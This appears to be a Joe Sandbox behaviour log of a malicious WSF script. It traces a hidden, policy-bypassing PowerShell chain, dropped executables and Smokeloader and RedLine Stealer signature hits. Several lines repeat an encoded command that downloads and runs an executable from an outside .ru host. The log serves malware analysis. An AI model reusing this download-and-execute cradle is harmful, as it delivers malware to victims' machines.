      Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_00401529
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_00402FFA RtlCreateUserThread,NtTerminateProcess,12_2_00402FFA
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_00401541
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_00401545
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_00401553
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_00402379 NtQuerySystemInformation,12_2_00402379
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_0040237B NtQuerySystemInformation,12_2_0040237B
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_00401534
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,12_2_004014DB
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_004020EA NtQuerySystemInformation,12_2_004020EA
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_00402387 NtQuerySystemInformation,12_2_00402387
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_00402397 NtQuerySystemInformation,12_2_00402397
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_0040239B NtQuerySystemInformation,12_2_0040239B
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_0040239E NtQuerySystemInformation,12_2_0040239E
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_00401529 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_00401529
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_00402FFA RtlCreateUserThread,NtTerminateProcess,15_2_00402FFA
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_00401541 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_00401541
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_00401545 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_00401545
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_00401553
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_00402379 NtQuerySystemInformation,15_2_00402379
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_0040237B NtQuerySystemInformation,15_2_0040237B
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_0040332A NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,NtQueryKey,NtEnumerateKey,RtlCreateUserThread,strstr,tolower,towlower,15_2_0040332A
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_00401534 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_00401534
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,15_2_004014DB
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_004020EA NtQuerySystemInformation,15_2_004020EA
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_00402387 NtQuerySystemInformation,15_2_00402387
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_00402397 NtQuerySystemInformation,15_2_00402397
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_0040239B NtQuerySystemInformation,15_2_0040239B
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_0040239E NtQuerySystemInformation,15_2_0040239E
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_00418A7012_2_00418A70
      Source: C:\Windows\explorer.exeCode function: 14_2_083828D014_2_083828D0
      Source: C:\Windows\explorer.exeCode function: 14_2_0AC428D014_2_0AC428D0
      Source: C:\Users\user\AppData\Roaming\tesubbaCode function: 15_2_00418A7015_2_00418A70
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\oBuf.exe F488B4EB65D5F5339401FC0869E614433719E64A5156945B530F98C7D39452E1
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\tesubba F488B4EB65D5F5339401FC0869E614433719E64A5156945B530F98C7D39452E1
      Source: w4DO1Z18yg.wsfInitial sample: Strings found which are bigger than 50
      Source: 0000000F.00000002.1688228770.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 0000000F.00000002.1688128712.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 0000000E.00000002.2505713156.000000000AC41000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 0000000C.00000002.1426355284.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 0000000C.00000002.1426518576.00000000008DE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 0000000C.00000002.1426166777.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 0000000F.00000002.1688048281.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 0000000F.00000002.1688289070.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 0000000E.00000002.2501060273.0000000008381000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 0000000C.00000002.1426113071.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: oBuf.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: tesubba.14.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.expl.evad.winWSF@9/5@3/2
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 12_2_008E14FF CreateToolhelp32Snapshot,Module32First,12_2_008E14FF
      Source: C:\Windows\explorer.exeCode function: 14_2_08383678 CoCreateInstance,14_2_08383678
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tesubbaJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1340:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcaxh05i.peg.ps1Jump to behavior
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: w4DO1Z18yg.wsfReversingLabs: Detection: 26%
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\w4DO1Z18yg.wsf"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\oBuf.exe "C:\Users\user~1\AppData\Local\Temp\oBuf.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\tesubba C:\Users\user\AppData\Roaming\tesubba
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\oBuf.exe "C:\Users\user~1\AppData\Local\Temp\oBuf.exe" Jump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
